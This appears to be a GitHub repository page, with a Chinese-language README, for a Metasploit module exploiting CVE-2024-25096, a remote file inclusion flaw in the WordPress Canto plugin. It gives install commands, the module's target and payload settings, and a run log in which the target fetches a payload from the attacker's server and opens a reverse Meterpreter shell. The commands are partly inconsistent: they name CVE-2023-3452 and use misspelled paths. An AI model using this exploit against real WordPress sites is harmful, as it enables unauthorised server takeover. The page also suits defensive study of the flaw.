puppetma4ster/Metasploit-Wordpress-Canto-Exploit-RCE-CVE-2024-25096

GitHub: puppetma4ster/Metasploit-Wordpress-Canto-Exploit-RCE-CVE-2024-25096

针对 WordPress Canto 插件远程代码执行漏洞的 Metasploit 利用模块,通过 RFI 漏洞获取服务器 Meterpreter 会话。

Stars: 0 | Forks: 0

# Metersploit exploit module canto RCE CVE-2024-25096 这是用于 Metasploit 的 Canto RCE CVE-2024-25096 概念验证(PoC)漏洞利用程序。 ## 用法 下载该漏洞利用程序并将其添加到 metasploit 模块文件夹中。 重新加载 Metasploit 并选择 payload。 ``` git exploit cp explit/rce_exploit_cve_2023_3452.rb ~/.msf4/modules/exploits/ msfconsole reload_all search rce_exploit_cve_2023_3452 use 0 ``` 设置所需变量的值 ``` Module options (exploit/rce_exploit_cve_2023_3452): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h RHOSTS 192.168.0.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 8080 yes Port SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 9998 yes The local port to listen on. SSL false yes Use SSL SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETFILE get.php yes Vulnerable PHP file TARGETURI /wp-content/plugins/canto yes Path to cantos root directory URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.0.2 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wordpress cantp plugin <= 3.0.7 ``` 运行漏洞利用程序并祝好运 ;) ``` [msf](Jobs:1 Agents:0) exploit(my_expi) >> run [*] Started reverse TCP handler on 192.168.0.2:4444 [*] Starting HTTP server... [*] Using URL: http://192.168.0.2:9998/Rj5Nh2b [*] Triggering RFI... [*] 192.168.0.3 my_expi - Sending admin.php payload [*] Sending stage (42137 bytes) to 192.168.0.3 [*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.3:42234) at 2026-02-28 23:40:27 +0100 ```
标签:Canto, CISA项目, CVE-2024-25096, CVEDetails, PHP漏洞, PoC, RCE, WordPress插件, 攻击框架, 攻击路径可视化, 数据展示, 暴力破解, 红队, 编程工具, 网络安全, 远程代码执行, 隐私保护, 验证代码, 黑客工具